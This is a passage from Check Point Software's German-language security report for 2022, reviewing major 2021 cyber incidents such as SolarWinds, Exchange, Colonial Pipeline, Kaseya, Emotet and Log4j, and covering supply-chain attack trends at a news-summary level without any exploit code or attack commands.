Report | Cyber-Sicherheitsbericht

Report | Cyber-Sicherheitsbericht

Report | Cyber-Sicherheitsbericht

2CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

SIE VERDIENEN DIE BESTE

SICHERHEIT

3CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

K APITEL 1: EINFÜHRUNG IN DEN CHECK POINT SICHERHEITSBERICHT 2022

KAPITEL 2: ÜBERSICHT DER WICHTIGSTEN CYBER-EVENTS DES JAHRES 2021

K APITEL 3: CYBERSICHERHEITS-TRENDS 2021 13 Von SolarWinds zu Log4j

17 Die Folgen von Cyberangriffen

21 Cloud-Dienste unter Beschuss

25 Mobile Arena-Entwicklungen

28 Risse im Ransomware-Ökosystem

K APITEL 4: MALWARE IM R AMPENLICHT: DIE RÜCKKEHR VON EMOTE T

K APITEL 5: GLOBALE STATISTIKEN 41 Globale Malware-Statistiken

43 Globale Analyse der Top Malware

45 Globale Analyse der Botnets

47 Globale Analyse der Infostealer-Malware

49 Globale Analyse der Kryptominer

51 Globale Analyse der Banken-Trojaner

53 Globale Analyse von mobiler Malware

I N H A L T

05

07 12

31 34

4CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

K APITEL 6: WICHTIGE GLOBALE SCHWACHSTELLEN 55 ‘Log4Shell’ Apache Log4j—Remote Code Execution

(CVE-2021-44228)

56 ‘ProxyLogon’ Microsoft Exchange Server - Authentifizierung- sumgehung (CVE-2021-26855)

56 Atlassian Confluence – Remote Code Execution (CVE-2021-26084)

K APITEL 7: DIE NÄCHSTE CYBERPANDEMIE VERHINDERN – EINE STR ATEGIE FÜR BESSERE CYBERSICHERHEIT

60 Bedrohungsprävention – Verhinderung von Angriffen, bevor sie geschehen

60 Wenn der Perimeter grenzenlos ist und Angriffe immer raffinierter werden, benötigt Ihr Unternehmen eine angemessene Prävention auf Grundlage von Bedrohungsdaten in Echtzeit

61 Sichern Sie alles, denn alles ist ein potenzielles Angriffsziel

61 Einsatz einer vollständig vereinheitlichten Architektur

62 Aufrechterhaltung der Sicherheitshygiene

64 Fazit

ANHANG: BESCHREIBUNG DER MALWARE-FAMILIEN

54

59

65

5CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 5CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

01 K A P I T E L 1

EINFÜHRUNG IN DEN CHECK POINT SICHERHEITSBERICHT 2022

01

DIE VERGANGENEN ZWÖLF MONATE ZÄHLEN ZU DEN TURBULENTESTEN UND STÖRUNGSREICHSTEN PERIODEN, DIE WIR KENNEN, ZUMINDEST, WAS DIE SICHERHEIT BETRIFFT.

6CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 6CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

M A Y A H O R O W I T Z VP Research, Check Point

Die vergangenen zwölf Monate zählen zu den turbulentesten und störungsreichsten Perioden, die wir kennen, zumindest, was die Sicherheit betrifft. Während Regierungen und Unternehmen auf der ganzen Welt weiterhin durch die unbekannten Gewässer einer globalen Pandemie navigierten, schien die so genannte „neue Normalität“ noch in weiter Ferne. Die Bemühungen um die digitale Transformation wurden durch die Einführung von Hybrid- und Telearbeitsmodellen dramatisch beschleunigt, aber die gleichen Fragen zum Thema Sicherheit, die viele Unternehmen im Jahr 2020 beschäftigten, blieben auch 2021 bestehen. Während einige dieser Fragen weiterhin offen sind, haben die Bedrohungsakteure keine Zeit verschwendet, um die Situation zu ihrem Vorteil zu nutzen. Seit der Veröffentlichung unseres letzten Jahresberichts haben Cyberangriffe um durchschnittlich 50 % zugenommen, wobei der Bildungs- und Forschungssektor mit durchschnittlich 1.605 Angriffen pro Woche im Laufe des Jahres am stärksten betroffen war. Wie vorhergesagt, scheint die berüchtigte SolarWinds-Sicherheitslücke einen Trend zu Angriffen auf die Lieferkette ausgelöst zu haben, der das ganze Jahr über anhielt und keine Tendenz zur Abschwächung zeigt.

Im Sicherheitsbericht 2022 stellen wir die wichtigsten Angriffsvektoren und -techniken vor, die unsere Forscher hier bei Check Point Software im vergangenen Jahr beobachtet haben. Die Bedrohungen reichen von einer neuen Generation hochentwickelter Angriffsmethoden auf die Lieferkette bis hin zur Ausnutzung der Log4j-Schwachstelle, die Hunderttausende von Unternehmen für potenzielle Datenpannen anfällig gemacht hat.

Wir beginnen mit einem monatlichen Überblick über die wichtigsten Cyber- Ereignisse des Jahres, bevor wir einige der sich abzeichnenden Trends, die das kommende Jahr zweifellos prägen werden, näher beleuchten. Wir besprechen Cloud-Dienste, Entwicklungen in der mobilen Landschaft und im Internet der Dinge, Risse im Ransomware-Ökosystem, die Rückkehr von Emotet und natürlich die Zero-Day-Schwachstelle Log4J, die uns in einem ohnehin schon arbeitsreichen Jahr getroffen hat.

K A P I T E L 1

7CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 7CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

K A P I T E L 2

02 ÜBERSICHT DER WICHTIGSTEN CYBER-EVENTS DES JAHRES 2021

IM JAHR 2021 WURDEN WIR ZEUGE EINER UNGEWÖHNLICH HOHEN ZAHL VON ANGRIFFEN, DIE DAS TÄGLICHE LEBEN DER MENSCHEN BEEINTRÄCHTIGTEN UND IN EINIGEN FÄLLEN SOGAR IHR GEFÜHL DER KÖRPERLICHEN SICHERHEIT BEDROHTEN.

8CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Im Januar bestätigte das US-Justizministerium, dass es vom Solarwinds-Angriff auf die Lieferkette betroffen war und dass auf 3 % der E-Mail-Postfächer seiner Mitarbeiter zugegriffen wurde, um sensible Daten zu stehlen. Das Ministerium hat mehr als 100.000 Mitarbeiter in einer Reihe von Strafverfolgungsbehörden, darunter das FBI, die Drug Enforcement Agency und der US Marshals Service. Das Justizministerium war ein Abnehmer von SolarWinds Orion, einem Tool, das von den Hackern zur Durchführung dieses Angriffs verwendet wurde, was dazu führte, dass bis zu 18.000 SolarWinds-Kunden von einem Sicherheitsverstoß betroffen waren. Das Justizministerium teilte mit, dass es an Heiligabend erfahren habe, dass ein kleiner Prozentsatz seiner Microsoft Office 365-E-Mail-Konten kompromittiert worden sei.

Im Februar war die beliebte Musikstreaming-Plattform Spotify von einem Angriff mit manipulierten Zugangsdaten betroffen, nur drei Monate nach einem ähnlichen Vorfall. Bei dem Angriff wurden die Zugangsdaten von 100.000 Benutzerkonten gestohlen und eine bösartige Spotify-Anmeldedatenbank ausgenutzt. Der Angriff wurde Spotify gemeldet, woraufhin das Unternehmen den betroffenen Nutzern einen Passwort-Reset ermöglichte, der die gestohlenen Zugangsdaten ungültig machte. Das Unternehmen teilte in einer Erklärung mit, dass es sich auch darum bemüht habe, die betrügerische Datenbank von seinem Internetdienstanbieter löschen zu lassen, und dass der Angriff nicht mit einer Beeinträchtigung der Sicherheit von Spotify selbst zusammenhänge. Cyberkriminelle, die Credential-Stuffing betreiben, greifen Personen an, die dieselben Passwörter für mehrere Online-Konten und -Plattformen wiederverwenden. Die Angreifer erstellen einfach automatisierte Skripte, die systematisch gestohlene IDs und Passwörter für verschiedene Arten von Konten ausprobieren.

Am 2. März 2021 meldete Volexity die Ausnutzung der Microsoft Exchange Server- Schwachstellen CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 und CVE-2021-27065 „in freier Wildbahn“. Weitere Untersuchungen ergaben, dass ein Angreifer eine Zero-Day-Lücke ausnutzte, die in freier Wildbahn verwendet wurde. Der Angreifer nutzte die Schwachstelle, um den gesamten Inhalt mehrerer Benutzerpostfächer zu stehlen. Diese Schwachstelle kann aus der Ferne ausgenutzt werden und erfordert keine Authentifizierung, keine besonderen Kenntnisse und keinen Zugang zu einer bestimmten Umgebung. Schätzungsweise 250.000 Server waren von den Angriffen betroffen, darunter Server von rund 30.000 Organisationen in den Vereinigten Staaten und 7.000 Server in Großbritannien. Die Europäische Bankenaufsicht, das norwegische Parlament und die chilenische Finanzmarktkommission (CMF) waren ebenfalls betroffen.

01 JAN

03 MÄR

02 FEB

https://www.theguardian.com/technology/2021/jan/06/doj-email-systems-solarwinds-hackers https://www.darkreading.com/attacks-breaches/spotify-hit-with-another-credential-stuffing-attack/d/d-id/1340083 https://www.darkreading.com/attacks-breaches/spotify-hit-with-another-credential-stuffing-attack/d/d-id/1340083 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065 https://www.forbes.com/sites/daveywinder/2021/03/09/eu-banking-authority-hacked-as-microsoft-exchange-attacks-continue/ https://www.forbes.com/sites/daveywinder/2021/03/09/eu-banking-authority-hacked-as-microsoft-exchange-attacks-continue/?sh=20c0b9f2fe06 https://www.reuters.com/article/us-norway-cyber-idUSKBN2B21TX https://www.reuters.com/article/us-norway-cyber-idUSKBN2B21TX https://www.bleepingcomputer.com/news/security/chiles-bank-regulator-shares-iocs-after-microsoft-exchange-hack/

9CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Im April veröffentlichten die Nationale Sicherheitsbehörde der USA (NSA), die Agentur für Cybersicherheit und Infrastruktursicherheit (CISA) und das Federal Bureau of Investigation (FBI) eine gemeinsame Warnung, dass eine mit Russland verbundene APT-Gruppe, APT29, fünf Sicherheitslücken in einem laufenden Angriff gegen US-Ziele ausnutzt. Dem Bericht zufolge nutzten die Akteure des russischen Auslandsgeheimdienstes (SVR) (auch bekannt als APT29, Cozy Bear und The Dukes) häufig öffentlich bekannte Schwachstellen, um an verwundbare Systeme heranzukommen und diese auszunutzen, um Anmeldedaten zu erhalten, die einen weiteren Zugriff ermöglichen. Zu den jüngsten Aktivitäten des russischen SVR gehören die Kompromittierung von SolarWinds Orion-Software-Updates, die gezielte Ausnutzung von COVID-19-Forschungseinrichtungen durch den Einsatz der WellMess-Malware und die Ausnutzung einer Schwachstelle in VMware, die zu diesem Zeitpunkt eine Zero-Day-Lücke war.

Im Mai legte ein Ransomware-Angriff den Betrieb der Colonial Pipeline lahm, die 45 % des an der Ostküste der USA verbrauchten Kraftstoffs, darunter Diesel, Benzin und Kerosin, transportiert. Hinter dem Angriff steckte die mutmaßliche russische Ransomware- Gruppe DarkSide. Colonial Pipeline ist die größte Pipeline für raffinierte Produkte in den USA, ein 5.500 Meilen (8.851 km) langes System, das über 100 Millionen Gallonen (rund 455 Millionen Liter) Mineralöl von der texanischen Stadt Houston zum Hafen von New York transportiert. DarkSide nutzt ein Ransomware-as-a-Service (RaaS)-Modell, bei dem es sich auf ein Partnerprogramm zur Ausführung seiner Cyberangriffe stützt. Colonial Pipeline zahlte ein Lösegeld von fast 5 Millionen US-Dollar für einen Dechiffrierschlüssel. Später erklärte das FBI, dass es den privaten Schlüssel des Lösegeldkontos erlangt und 63,7 der gezahlten Bitcoins zurückerhalten habe.

Der US-amerikanische Fleischproduzent JBS war im Juni von einem Ransomware-Angriff betroffen, der seinen Betrieb in Nordamerika und Australien betraf. Das FBI schrieb den Angriff der Ransomware-Gruppe REvil zu. Der Angriff zwang JBS zur vorübergehenden Schließung aller seiner Anlagen in den Vereinigten Staaten. Eine der kanadischen Anlagen war ebenfalls betroffen, und das Unternehmen setzte die Tötung von Rindern und Lämmern in Australien aus, bis die Anlagen wieder in Betrieb gingen. Am 9. Juni gab der Geschäftsführer von JBS in den USA bekannt, dass das Unternehmen in einer „sehr schmerzhaften, aber notwendigen Entscheidung“ 11 Millionen US-Dollar an die Hacker gezahlt hat, obwohl die meisten seiner Systeme aus eigenen Backups wiederhergestellt werden konnten.

04 APR

06 JUN

05 MAI

https://www.fbi.gov/news/pressrel/press-releases/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabilities-to-compromise-us-and-allied-networks https://www.nytimes.com/2021/05/08/us/politics/cyberattack-colonial-pipeline.html https://www.bloomberg.com/news/articles/2021-05-13/colonial-pipeline-paid-hackers-nearly-5-million-in-ransom https://www.zdnet.com/article/fbi-attributes-jbs-ransomware-attack-to-revil/ https://www.zdnet.com/article/fbi-attributes-jbs-ransomware-attack-to-revil/ https://www.bloomberg.com/news/articles/2021-05-31/meat-is-latest-cyber-victim-as-hackers-hit-top-supplier-jbs

10CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Im Juli richtete die Ransomware-Gruppe REvil einen Angriff auf die Lieferkette gegen mehrere Managed Service Provider (MSPs) und deren Kunden. Die Bedrohungsakteure implantierten erfolgreich ein bösartiges Software-Update für das Patch-Management- und Client-Überwachungs-Tool VSA des IT-Unternehmens Kaseya, das den Malware-Installer enthielt. Schätzungsweise 1.000 Unternehmen waren von dem Angriff betroffen. Der massive Angriff auf die Lieferkette, der von REvil am Wochenende des 4. Juli durchgeführt wurde, betraf zahlreiche Kunden von Kaseya, von denen Lösegelder in Millionenhöhe gefordert wurden. Kaseya hat einen Sicherheitshinweis auf seiner Website veröffentlicht und alle Kunden dazu aufgefordert, ihre VSA-Server unverzüglich herunterzufahren, um die Ausbreitung des Angriffs zu verhindern, während die Ermittlungen laufen. Um in die Kaseya VSA-Server vor Ort einzudringen, nutzte REvil eine Zero-Day-Schwachstelle, die gerade behoben werden sollte. Die Schwachstelle war Kaseya zuvor von Sicherheitsexperten des Dutch Institute for Vulnerability Disclosure (DIVD) gemeldet worden, und Kaseya validierte den Patch, ehe er an die Kunden verteilt wurde. Die Ransomware-Gruppe REvil war Kaseya jedoch einen Schritt voraus und nutzte die Sicherheitslücke für ihren Angriff, bei dem Lösegelder zwischen 45.000 und 5 Millionen US-Dollar gefordert wurden. Mit dem Angriff auf die VSA-Server von Kaseya konzentrierte sich REvil zunächst auf die MSSP von Kaseya, mit der klaren Absicht, auch die Kunden der MSSP ins Visier zu nehmen. Der Angriff weitete sich exponentiell vom MSSP auf die Kunden aus.

Der bisher größte DDoS-Angriff (Distributed Denial of Service) wurde im August mit 17,2 Millionen Anfragen pro Sekunde festgestellt. Der Angriff wurde durch das Mirai-Botnet ermöglicht und richtete sich gegen ein Unternehmen aus der Finanzbranche. In diesem speziellen Fall ging der Datenverkehr von mehr als 20.000 Bots in 125 Ländern weltweit aus, wobei fast 15 % des Angriffs aus Indonesien stammten, gefolgt von Indien, Brasilien, Vietnam und der Ukraine. Mirai wurde erstmals 2016 beobachtet, als es auf Geräte des Internets der Dinge (IoT) wie CCTV-Kameras und Router abzielte. Seitdem sind zahlreiche Varianten des Botnets aufgetaucht, die die Liste der anvisierten Geräte um Linux-Router und -Server, Android-Geräte und andere erweitern.

Check Point Research hat nach der Ankündigung der Impfpflicht durch US-Präsident Biden einen weltweiten Anstieg des Schwarzmarktes für gefälschte COVID-19-Impfnachweise auf Telegram beobachtet. Der Schwarzmarkt weitete sich auf 28 Länder aus, darunter Österreich, die Vereinigten Arabischen Emirate, Brasilien, Großbritannien, Singapur und andere. Auch der Preis für gefälschte Impfnachweise stieg weltweit sprunghaft an, so auch in den USA, wo er sich von 100 auf 200 US-Dollar verdoppelte.

09 SEP

08 AUG

07 JUL

https://thehackernews.com/2021/07/kaseya-revil-ransomware-attack.html http://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689 https://www.securityweek.com/mirai-botnet-infects-devices-164-countries https://www.securityweek.com/mirai-botnet-infects-devices-164-countries https://blog.checkpoint.com/2021/09/14/amid-vaccine-mandates-fake-vaccine-certificates-become-a-full-blown-industry/

11CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Im Oktober wurde die Infrastruktur der in Russland ansässigen Ransomware-Gruppe REvil, die für zahlreiche Ransomware-Angriffe verantwortlich ist, zum zweiten Mal innerhalb von drei Monaten kompromittiert und gewaltsam abgeschaltet, wodurch ihre Tätigkeit zum Stillstand kam. Dies geschah, nachdem REvils Website „Happy Blog“ im Juli abgeschaltet (zusammen mit dem verdächtigen Verschwinden von „UNKN“, einem der Anführer von REvil) und im September von einem der verbliebenen Anführer wieder in Betrieb genommen worden war. Die Ransomware REvil wurde im Jahr 2021 durch eine Reihe verheerender Angriffe bekannt, insbesondere durch die erfolgreiche Erpressung des Lebensmittelkonzerns JBS zur Zahlung von 11 Millionen US-Dollar und die spätere Kompromittierung von Kaseya, einem US-amerikanischen Softwaremanagement- Unternehmen, im Juli. Diese immer verheerenderen Angriffe gingen einher mit einem verstärkten Druck seitens der Behörden und der Einleitung eines offensiven Angriffs gegen die Infrastruktur von REvil und seine Mitglieder.

Am 14. November ist Emotet, eines der berüchtigtsten Botnets der Geschichte, zu neuem Leben erwacht, nachdem es zehn Monate zuvor durch eine gemeinsame Aktion internationaler Strafverfolgungsbehörden ausgeschaltet worden war. Emotet nutzte das Trickbot-Botnet, um seinen Betrieb aufzunehmen, als Rechner, die bereits mit dem Trickbot-Trojaner infiziert waren, begannen, die neueste Version von Emotet herunterzuladen und auszuführen. Emotet selbst ging daraus mit diversen Ergänzungen sogar gestärkt hervor. Unter anderem verfügt es nun über ein aktualisiertes Verschlüsselungsschema, Kontrollflussverschleierung und neue Übertragungsmethoden.

An 9. Dezember wurde eine akute Schwachstelle (Remote Code Execution; RCE) im Apache- Logging-Paket Log4j 2, Version 2.14.1 und früher, gemeldet (CVE-2021-44228). Apache Log4j ist die beliebteste Logging-Bibliothek für Java mit mehr als 400.000 Downloads von der GitHub-Seite des Projekts. Sie wird von einer großen Anzahl von Unternehmen weltweit verwendet und stellt die Protokollierung in einer Vielzahl gängiger Anwendungen bereit. Das Ausnutzen dieser Schwachstelle ist einfach. Die Log4j-Bibliothek ist in fast allen uns bekannten Internetdiensten und -anwendungen enthalten, darunter Twitter, Amazon, Microsoft, Minecraft und viele mehr. Seit dem Ausbruch hat Check Point Research eine Art evolutionäre Repression beobachtet, bei der in kürzester Zeit neue Varianten des ursprünglichen Exploits eingeführt wurden – über 60 in weniger als 24 Stunden. Dies war eindeutig eine der schwerwiegendsten Sicherheitslücken der letzten Jahre.

10 OKT

12 DEZ

11 NOV

https://techcrunch.com/2021/10/18/revil-ransomware-group-goes-dark-after-its-tor-sites-were-hijacked/?guccounter=1 https://www.zdnet.com/article/revil-websites-down-after-governments-pressured-to-take-action-following-kaseya-attack/ https://www.bleepingcomputer.com/news/security/jbs-paid-11-million-to-revil-ransomware-225m-first-demanded/ https://www.zdnet.com/article/updated-kaseya-ransomware-attack-faq-what-we-know-now/ https://www.europol.europa.eu/media-press/newsroom/news/world%E2%80%99s-most-dangerous-malware-emotet-disrupted-through-global-action https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/ https://research.checkpoint.com/2021/the-laconic-log4shell-faq/ https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/

12CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

K A P I T E L 3

CYBERSICHERHEITS- TRENDS 2021

03

IM JAHR 2021 NAHMEN DIE ANGRIFFE AUF DIE SOFTWARE- LIEFERKETTE SOWOHL AN HÄUFIGKEIT ALS AUCH AN UMFANG ZU. FORSCHER ERKANNTEN, DASS ANGRIFFE AUF DIE SOFTWARE-LIEFERKETTE IM LAUFE DES JAHRES UM NICHT WENIGER ALS 650 % ZUGENOMMEN HABEN.

13CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

VON SOLARWINDS ZU LOG4J Der berüchtigte Angriff auf SolarWinds wurde im Dezember 2020 aufgedeckt, aber sein Einfluss auf die Angriffslandschaft der Cloud, insbesondere in Bezug auf Angriffe auf die Lieferkette, hat dazu geführt, dass er erneut in unseren Bericht aufgenommen wurde. Der Vorfall bei SolarWinds hat seinen Ursprung in einer ausgeklügelten Malware namens Sunburst, die in mehrere kompromittierte Versionen eines IT-Ressourcenmanagementprodukts namens SolarWinds Orion integriert wurde, das von 33.000 Kunden weltweit genutzt wird. Das bösartige Update, das der mit dem russischen Geheimdienst verbundenen Gruppe „Nobelium“ zugeschrieben wird, fand seinen Weg zu rund 18.000 Unternehmen und infizierte erfolgreich etwa 425 Unternehmen der Fortune-500-Liste sowie US-Regierungsbehörden, darunter das

Ministerium für Heimatschutz und das Finanzministerium.

L O T E M F I N K E L S T E E N Director,

Threat Intelligence & Research

K A P I T E L 3

Der Angriff auf SolarWinds war ein Meilenstein für Sicherheitsexperten, nicht nur wegen des Umfangs des Angriffs, sondern auch, weil die verwendete Technik ein neues Maß an Raffinesse offenbarte, das die Bedrohung durch Angriffe auf die Lieferkette im Allgemeinen erhöhte. Mit dem Vorfall bei SolarWinds wurde ein neuer Ton angeschlagen, und wie vorhergesagt, ist die Zahl der Vorfälle in der Software-Lieferkette in der Folge gestiegen. Im vergangenen Jahr hat sich die Zahl der Vorfälle versechsfacht, und es gibt erneut Anzeichen dafür, dass die Unternehmen nicht auf die Bedrohung vorbereitet sind.

https://research.checkpoint.com/2021/solarwinds-explained/ https://krebsonsecurity.com/2020/12/solarwinds-hack-could-affect-18k-customers/ https://research.checkpoint.com/2021/deep-into-the-sunburst-attack/ https://fortune.com/2020/12/15/solarwinds-hackers-u-s-agencies/ https://www.businessinsider.com/solarwinds-hack-explained-government-agencies-cyber-security-2020-12

14CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 14CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Natürlich sind prominente APT-Gruppen ein integraler Bestandteil dieses Trends. Die nordkoreanische Lazarus-Gruppe hat vor kurzem damit begonnen, IT-Dienstleister ins Visier zu nehmen, um Angriffe auf die Lieferkette zu starten, und eine neue Hintertür namens BLINDINGCAN wurde bereits verwendet, um einen lettischen IT-Anbieter und ein südkoreanisches Softwareunternehmen anzugreifen. Zu den weiteren Vorfällen gehört ein Angriff auf einen Anbieter von Videoüberwachungssystemen, der von einem Mitglied der DarkSide-Ransomware-Bande durchgeführt wurde. Dabei wurde die Website des Anbieters kompromittiert, um dessen Kunden mit Ransomware zu infizieren.

Einer der bedeutendsten Angriffe auf die Lieferkette im Jahr 2021, bei dem auch Ransomware zum Einsatz kam, richtete sich gegen Kaseya, einen globalen Anbieter von IT-Verwaltungssoftware für Managed Service Provider (MSPs) und IT-Teams. Der Angriff wurde von einem Mitglied des Partnerprogramms der Ransomware-Gruppe REvil durchgeführt. Laut dem CEO von Kaseya wurde auf weniger als 0,1 % der Kunden des Unternehmens zugegriffen. Da einige der Kunden von Kaseya selbst MSPs sind, waren jedoch bis zu 1.500 Unternehmen von dem Angriff betroffen. Die Bedrohungsakteure nutzten geschickt eine Schwachstelle aus, die die VSA-Server von Kaseya im Internet betrifft. VSA ist ein Fernüberwachungs-Tool, das häufig von MSPs für die Verwaltung von Netzwerk- und Endgeräten verwendet wird. Als der Angriff von Kaseya entdeckt wurde, forderte das Unternehmen seine Kunden auf, ihre VSA- Server abzuschalten.

Wie in unserem letzten Bericht beschrieben, liegt die Hauptinnovation von SolarWinds neben seinem beispiellosen Umfang in seiner Technik. Um sich Zugang zu den sensiblen Microsoft 365-Ressourcen eines Unternehmens zu verschaffen, nutzten die Angreifer zunächst ein gefälschtes Token, um die lokalen Netzwerke zu kompromittieren, bevor sie sich seitlich in die Cloud-Umgebung bewegten. Heute können wir eindeutig feststellen, dass der Angriff auf SolarWinds den Grundstein für einen rasanten Anstieg der Angriffe auf die Lieferkette gelegt hat.

Im Jahr 2021 nahmen die Angriffe auf die Software-Lieferkette sowohl an Häufigkeit als auch an Umfang zu. Forscher erkannten, dass Angriffe auf die Software-Lieferkette im Laufe des Jahres um nicht weniger als 650 % zugenommen haben. Eine von der Europäischen Agentur für Cybersicherheit (ENISA) herausgegebene Studie untersuchte zwei Dutzend Vorfälle und stellte fest, dass 66 % der Angriffe auf die Lieferkette unter Ausnutzung einer unbekannten Schwachstelle erfolgten, während nur in 16 % der Fälle bekannte Softwarefehler ausgenutzt wurden. Die meisten Angriffe zielten auf Software-Code ab. In diesem Jahr wurden die Unternehmen offenbar wieder einmal weitgehend unvorbereitet erwischt, denn eine Umfrage ergab, dass 82 % der Unternehmen den Drittanbietern, die ihre Software-Lieferkette bilden, hoch privilegierte Rollen zuweisen. 76 % stellen Rollen zur Verfügung, die die Übernahme von Konten ermöglichen, und das Schlimmste ist, dass über 90 % der Sicherheitsteams nicht wussten, dass solche Berechtigungen überhaupt erteilt wurden.

K A P I T E L 3

https://www.darkreading.com/threat-intelligence/north-korea-s-lazarus-group-turns-to-supply-chain-attacks https://securityaffairs.co/wordpress/119051/cyber-crime/unc2465-supply-chain-attack.html https://www.cisa.gov/uscert/kaseya-ransomware-attack https://www.cisa.gov/uscert/kaseya-ransomware-attack https://www.cisa.gov/uscert/kaseya-ransomware-attack https://www.zdnet.com/article/updated-kaseya-ransomware-attack-faq-what-we-know-now/ https://www.zdnet.com/article/updated-kaseya-ransomware-attack-faq-what-we-know-now/ https://www.cisa.gov/uscert/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021 https://www.cisecurity.org/solarwinds/ https://venturebeat.com/2021/09/15/next-gen-software-supply-chain-attacks-up-650-in-2021/ https://portswigger.net/daily-swig/four-fold-increase-in-software-supply-chain-attacks-predicted-in-2021-report https:// https://www.wiz.io/blog/82-of-companies-unknowingly-give-3rd-parties-access-to-all-their-cloud-data

15CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 15CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

In diesem Jahr hat die Gruppe, die hinter dem SolarWinds-Angriff steckt, ihre Aktivitäten wieder aufgenommen, wobei sie den für den ersten Angriff entwickelten Ansatz verwendet und sich erneut auf Unternehmen konzentriert, die Teil der globalen IT-Lieferkette sind. Diesmal wird jedoch ein anderer Teil der Kette ins Visier genommen, nämlich Cloud-Reseller und Anbieter von technischen Dienstleistungen. Diese Unternehmen passen Cloud-Dienste für ihre Kunden an, implementieren und verwalten sie. Die Bedrohungsgruppe nutzt eindeutig den direkten Zugang dieser Unternehmen zu den Umgebungen ihrer Kunden, um sich mit einem einzigen Angriff Zugang zu deren kompletten Kundenlisten zu verschaffen und sich als vertrauenswürdiger Partner auszugeben. Die Operation findet seit Mai 2021 statt und hat bereits mehr als 140 Anbieter und Händler betroffen, von denen 14 kompromittiert wurden. In der zweiten Jahreshälfte war die Bedrohungsgruppe „Nobelium“ sehr aktiv, aufgrund des wachsenden Bewusstseins allerdings mit einer geringeren Erfolgsquote. Die Gruppe wendet mehrere Taktiken an, darunter die Verwendung gestohlener Anmeldeinformationen, die über eine Infodiebstahl-Kampagne eines Drittanbieters erlangt wurden, Rechteausweitung durch Anwendungsimpersonifikation zur Erfassung geschützter E-Mails und Missbrauch von Multifaktor-Authentifizierung (MFA). Die jüngste Angriffswelle könnte darauf hindeuten, dass die vom russischen Staat gesponserte Gruppe mehr Ressourcen in den Bereich der Lieferkettenoperationen investiert, um sich dauerhaft Zugang zu Zielen zu verschaffen, die für die russische Regierung von Interesse sind.

Ende Oktober wurde das beliebte NPM-Paket „ua-parser-js“, das wöchentlich millionenfach heruntergeladen wird, von Angreifern kompromittiert. Über einen Zeitraum von vier Stunden gelang es den Akteuren, das NPM-Konto des Entwicklers zu übernehmen und bösartigen Code in drei Versionen der NPM-Bibliothek einzufügen. Die Bibliothek, die zum Parsen von User-Agent-Strings und zur Identifizierung des Browsers, des Betriebssystems, der CPU usw. verwendet wird, kommt in Tausenden von Projekten zum Einsatz, darunter auch in denen von Facebook, Microsoft, Amazon, Google und Slack. Der Angriff auf die Lieferkette, bei dem kompromittierte Pakete der Bibliothek anstelle der legitimen Bibliothek verteilt wurden, ermöglichte es den Bedrohungsakteuren daher, Malware auf einer großen Anzahl infizierter Geräte zu installieren. In diesem Fall wurden Linux- und Windows-Geräte mit Krypto-Minern und Werkzeugen zum Passwortdiebstahl infiziert.

Ein weiterer prominenter Vorfall ereignete sich im November, als mehrere griechische Reedereien von Ransomware betroffen waren. Dies geschah, nachdem ein gewöhnlicher IT-Dienstleister, Danaos Management Consultants, durch einen Angriff auf die Lieferkette kompromittiert wurde. Der Vorfall beeinträchtigte die Kommunikationskanäle der Reedereien, unterbrach den Kontakt zu anderen Schiffen, Lieferanten und Vertriebsmitarbeitern und führte auch zu Datenverlusten.

K A P I T E L 3

https://blogs.microsoft.com/on-the-issues/2021/10/24/new-activity-from-russian-actor-nobelium/ https://www.mandiant.com/resources/russian-targeting-gov-business https://www.mandiant.com/resources/russian-targeting-gov-business https://www.bleepingcomputer.com/news/security/popular-npm-library-hijacked-to-install-password-stealers-miners/ https://www.rapid7.com/blog/post/2021/10/25/npm-library-ua-parser-js-hijacked-what-you-need-to-know/ https://blog.sonatype.com/npm-project-used-by-millions-hijacked-in-supply-chain-attack https://www.maritime-executive.com/article/cyberattack-hits-multiple-greek-shipping-firms https://min.news/en/world/29d72504d76e21799a28f00dcd24012f.html

16CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 16CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Aufgrund der hohen Verbreitung der Bibliothek wird Log4Shell als die kritischste Schwachstelle des Jahres 2021 bezeichnet, wobei das volle Ausmaß des Schadens noch nicht bekannt ist. Die Apache Foundation hat einen Patch für die RCE-Schwachstelle veröffentlicht, aber dennoch wurde von mehreren Sicherheitsanbietern ein massenhaftes Scannen anfälliger Server beobachtet. Die Ausnutzungsrate der Log4j- Schwachstelle war schon kurz nach ihrer Aufdeckung ungewöhnlich hoch. Check Point Research entdeckte zwei Stunden nach Bekanntwerden der Log4j-Schwachstelle etwa 40.000 Angriffsversuche, und 72 Stunden nach dem Ereignis 830.000 Angriffsversuche.

